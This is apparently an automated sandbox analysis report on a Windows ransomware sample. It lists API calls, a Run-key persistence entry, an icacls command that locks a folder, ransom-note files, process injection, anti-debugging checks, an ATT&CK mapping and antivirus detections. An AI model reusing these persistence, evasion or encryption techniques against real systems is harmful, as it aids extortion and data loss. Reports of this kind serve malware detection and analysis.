Code function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

2_2_0040D240

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 0_2_041D07C6 CreateToolhelp32Snapshot,Module32First,

0_2_041D07C6

Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe

Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}

Source: bE5aaTiJM0.exe	String found in binary or memory: set-addPolicy
Source: bE5aaTiJM0.exe	String found in binary or memory: id-cmc-addExtensions

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: bE5aaTiJM0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: bE5aaTiJM0.exe, bE5aaTiJM0.exe, 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: C:\xat\100\fahunisu_kuxuse\wuce97-sibemudex.pdb source: bE5aaTiJM0.exe, bE5aaTiJM0.exe.2.dr
Source:	Binary string: AC:\xat\100\fahunisu_kuxuse\wuce97-sibemudex.pdb` source: bE5aaTiJM0.exe, bE5aaTiJM0.exe.2.dr
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: bE5aaTiJM0.exe, 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 0_2_041D30AF push ecx; retf		0_2_041D30B2
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_00428565 push ecx; ret		2_2_00428578

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 2_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,

2_2_00412220

Source: initial sample	Static PE information: section name: .text entropy: 7.947102009414188
Source: initial sample	Static PE information: section name: .text entropy: 7.947102009414188

Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File created: C:\Users\user\Desktop\bE5aaTiJM0.exe.vvyu (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	File created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File created: C:\Users\user\Desktop\bE5aaTiJM0.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File created: C:\_readme.txt			Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	File created: C:\Users\user\_readme.txt			Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_2-31324

Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bE5aaTiJM0.exe.vvyu (copy)			Jump to dropped file
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bE5aaTiJM0.exe			Jump to dropped file

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 0_2_041D171C rdtsc

0_2_041D171C

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

2_2_0040E670

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

2_2_0040F730

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

API call chain: ExitProcess graph end node

graph_2-31326

Source: bE5aaTiJM0.exe, 0000000B.00000003.435424110.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.436327985.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.618061651.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619380254.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448652959.000000000088C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bE5aaTiJM0.exe, 0000000B.00000002.436250212.00000000007A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: bE5aaTiJM0.exe, 0000000B.00000003.435424110.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.436327985.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWilter-0000
Source: bE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: bE5aaTiJM0.exe, 0000000C.00000002.619018447.0000000000848000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWpv

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 2_2_00424168 _memset,IsDebuggerPresent,

2_2_00424168

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 2_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

2_2_0042A57A

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

2_2_00412220

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 2_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

2_2_00447CAC

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 0_2_041D171C rdtsc

0_2_041D171C

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 0_2_041D00A3 push dword ptr fs:[00000030h]

0_2_041D00A3

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		2_2_004329EC
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: 2_2_004329BB SetUnhandledExceptionFilter,		2_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Memory written: C:\Users\user\Desktop\bE5aaTiJM0.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Memory written: C:\Users\user\Desktop\bE5aaTiJM0.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Memory written: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Memory written: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Memory written: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe base: 400000 value starts with: 4D5A	Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

2_2_00419F90

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe"	Jump to behavior
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Process created: C:\Users\user\Desktop\bE5aaTiJM0.exe "C:\Users\user\Desktop\bE5aaTiJM0.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe --Task	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart	Jump to behavior
Source: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	Process created: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart	Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	2_2_0043404A
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	2_2_00438178
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	2_2_00440116
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_004382A2
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	2_2_0043834F
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	2_2_00438423
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	2_2_004335E7
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: EnumSystemLocalesW,	2_2_004387C8
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: GetLocaleInfoW,	2_2_0043884E
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	2_2_00432B6D
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,	2_2_00437BB3
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: EnumSystemLocalesW,	2_2_00437E27
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_00437E83
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	2_2_00437F00
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	2_2_0042BF17
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	2_2_00437F83
Source: C:\Users\user\Desktop\bE5aaTiJM0.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,	2_2_00432FAD

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 2_2_00427756 cpuid

2_2_00427756

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 0_2_0049EC9B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_0049EC9B

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

Code function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

2_2_0042FE47

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

2_2_00419F90

Source: C:\Users\user\Desktop\bE5aaTiJM0.exe

2_2_00419F90

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Native API	1 Registry Run Keys / Startup Folder	1 Exploitation for Privilege Escalation	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	2 Command and Scripting Interpreter	1 Services File Permissions Weakness	111 Process Injection	3 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	21 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Software Packing	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Services File Permissions Weakness	1 Masquerading	NTDS	24 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	111 Process Injection	LSA Secrets	1 Query Registry	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Services File Permissions Weakness	Cached Domain Credentials	141 Security Software Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 Remote System Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	1 System Network Configuration Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
bE5aaTiJM0.exe	39%	Virustotal		Browse
bE5aaTiJM0.exe	54%	ReversingLabs	Win32.Trojan.RedLine
bE5aaTiJM0.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe	54%	ReversingLabs	Win32.Trojan.RedLine

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.2.bE5aaTiJM0.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1229097	Download File
16.0.bE5aaTiJM0.exe.400000.5.unpack	100%	Avira	HEUR/AGEN.1223627	Download File
